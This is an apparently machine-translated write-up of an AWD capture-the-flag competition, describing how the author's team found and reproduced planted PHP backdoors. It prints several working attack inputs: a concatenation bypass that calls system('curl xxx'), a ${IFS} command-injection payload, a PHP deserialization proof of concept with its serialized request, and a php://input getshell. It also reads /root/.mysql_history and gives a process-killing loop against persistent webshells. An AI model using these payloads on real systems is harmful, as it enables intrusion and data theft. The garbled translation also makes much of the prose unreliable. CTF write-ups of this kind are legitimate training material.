Preface:
Before the end of the review was busy, no time to sum up the feelings of competition and then reproduce, this time to sum up.
The first entry line at AWD feelings
Because it is the first time AWD game, all aspects of the experience are inadequate, a few days before the competition also collect all kinds of crazy script, frameworks, tools, etc., but also refer to the chef's blog to learn, here describe what I learned process:
First, make a backup
Read a lot of chef's blog, some blog master wrote some AWD game might give the same SSH account password , so you can download some modifications on Github SSH password batch script that allows the opponent to drop points at the outset, but after this game, the game has now discovered that in fact this does not happen again human vulnerability , and the organizers will avoid such loopholes, otherwise the whole game have no intention sense, so I think the bulk edit SSH password script online next game is useless, but at best a backup, in case the organizers lazy that (it is a bit cool). . .
When did that start of the game to do, the game is generally a team of three people, in order to get a good protective flag and its own drone in a short time, we need internal teams advance good clear division of labor , so that efficiency will be high.
In addition to need finalshell
this tool, this tool is used to connect your drone, very convenient, simply enter drone IP, SSH account password to control their drones, as a backup, and so prepare to hang waf
start of the race, the first step for backup, it is best to use visualization tools FileZilla FTP Client
for backup, you can also use linux
compression packing command itself, the purpose of backup is to exploit if the other into your drone your WWW
directory to delete, If you have not backed up the equivalent of downtime, and then waiting for it points, so the backup is very important to use the organizers of SSH账号密码、主机IP
connected backup
Second, look for backdoor or vulnerability
Another benefit is the ability to audit the backup source, because everyone's WWW
service directory are the same, so if we can be the first to find vulnerabilities in the source code, then they can receive a wavelength division, where it is used D盾
, you can use this tool find out if there is backdoor or other point of use
would also have a direction of attack, in addition to a is Seay源代码审计工具
this a direction you can provide attack
Third, prepare or write script
Script, the script, the script ! ! ! Very important to participate in a game it is found that the ability to script really too important, identify vulnerabilities is important, but if you do not write the corresponding batch script, you can imagine just so many teams, three manual submission, flag behind refresh every five minutes, inefficient and tired to death, so by all means to improve scripting capabilities (though my script sucks, but it will slowly improve), AWD game to the script is the ability to back ratio, provided you must first identify vulnerabilities. If you're like me currently scripting capabilities are weak, do not panic, chef's Github has written a lot of people, as long as we understand, will change it can be used on, I will not enumerate resources, and Google Baidu search a bunch. In a word, to learn python, learn to write their own scripts , really important! ! !
There is a backup of common POC, because most games are all kinds of AWD CMS, CMS more or less these loopholes, sometimes POC can be a big help, on GitHub have, not listed here
Fourth, the state of mind
Participate in a contest, the basic process is the above, but I think it is important, do not hold the mentality of how much we have to take rank, put the flat state of mind, do not panic, if the person was hit, going audit logs, see the chef is how you play, and see if other people use the attack, then you can use this point to get points, if the mentality of collapse, the entire game will be no fun, remember to change their attitude, previous entries on Do not worry so much about ranking, there are better, not to continue their efforts, but failed before the need to summarize where we are not in a row fell several times in a pit, in order to progress.
Second, reproduce
The game is relatively new to the care, CMS official loopholes does not appear, so it is useless to POC, but the organizers gave the players left a lot of backdoor, the game only been able to use a (our more vegetables ) but still brush a lot of points, the game will be the end of all of the vulnerabilities are reserved to reproduce it, not because after the end of the game do nothing.
First connect on their own drone
use tool to connect to the drone, and find the WWW
directory to back up the appropriate service
performed after successful backup D Shield scans
found three suspicious spot, a first look at the first
The first backdoor: backdoor
Trojans word, directly on ant sword
successful connection can use the curl
command to get the flag you want, but such a simple back door as we all know, so this needs to fight hand speed, and the importance of the script will be manifested
this is before writing the chef, we just modify some specific competition, but also won a lot of flag, so the script is really important !!!, in fact, observe the script, it is not hard to find, it is important that is the idea, or to practice more.
The second backdoor: Ice scorpion sentence
We are really dish, then turned the game when there is no ice scorpion found this word, when reproducible find this scorpion horse or downloaded ice when the ice comes scorpion horse. . .
Well, then if you see it first, and continue to fuel it, or know too little!
The third backdoor: Common bypass
This string of code filter function many characters such as commonly used in high-risk system
, etc.
If they can traverse the bypass input malicious statement, it would need to consider if bypassed, you can use stitching way to bypass:
payload:
?cmd=$a='syste';$b='m';$c=$a.$b;$c('curl xxx');
Indeed available, the more complex now feel more vegetables. . .
The fourth backdoor: command + variable coverage
This is most unfortunate, then, when we were playing, was detected by a ping_test.php
file request, we will see a bit of this document, it really is a command execution, but filters out some things
the observation that the introduction of a define.php
file, view file found
very clearly we see that the filter spaces, to die can not reproduce, and I want to play myself
There are ways to bypass spaces %09
,${IFS}
payload:
des=| curl${IFS}xxx
The fifth backdoor: Information Collection + + file that contains the deserialized
When auditing the source code found in admin.php
found to have a prompt
being the case went to see MySQL's history
look at what has changed
cat /root/.mysql_history
This directory holds for MYSQL
operating record, because I was here to build their own local so there is no information, but when the game should be prompted to \html\public\ueditor\php\controller.php
, and then observed phpinfo
and found allow_url_include
to On, you can use php://input
the protocol can be directly getshell
View Files found
obvious direct deserialize
Official toPOC
class Control{
public $file = '<?=phpinfo();?>';
private $flag;
public function __destruct(){
if(isset($this->file) && !preg_match('/<\?/is', $this->file)){
require($this->file);
}
}
}
$a = new Control();
$a->file = 'php://input';
echo serialize($a);
Run the online
request:
?action=shell&data=O:7:"Control":2: {s:4:"file";s:11:"php://input";s:13:"%00Control%00flag";N;}
Incoming POST
<?php system('curl xxx'); ?>
But here I do not reproduce successfully
Episode: Upload dead horse
In the beginning ant connection on the sword to think of into a dead horse
found to have been a failure, permission obviously the game is to root, so there is no tube, to be published later I learned that WP have permission to upload in the upload folder. . . .
Oh not finish this summary to play a league vent about how I so dishes ah
How to say the following about the dead horse, to prevent myself to forget
this is a common dead horse, and set up their own passwords were md5
encrypted, I set here islemon
If successful upload dead horse, triggered on the first
trigger successfully, view
the Trojan appears to connect
using the success! ! !
If you own drone was planted dead horse people, and if there is permission to use service apache2 restart
, can be deleted directly
If you do not have permission to restart kill off www-data
all child processes users
ps aux | grep www-data | awk '{print $2}' | xargs kill -9
Indeed deleted successfully
Third, create a directory and immortal Ma Shengcheng of horse names
Too dishes, did not reproduce successfully, specifically to see other chef's it! !
Fourth, the use writing a ignore_user_abort(true)
script function has been dead horse competition of write-erase files, which usleep () must be less than the time immortal horses usleep () time will have effect
<?php
while (1) {
$pid = 不死马的进程PID;
@unlink(".ski12.php");
exec("kill -9 $pid");
usleep(1000);
}
?>
to sum up:
I prefer the second to kill the process, as it will encounter other relatively simple, it is estimated after, then say it, but I was really batch of food, be sure to practice good scripting capabilities, these little techniques chef content, do not spray me. . .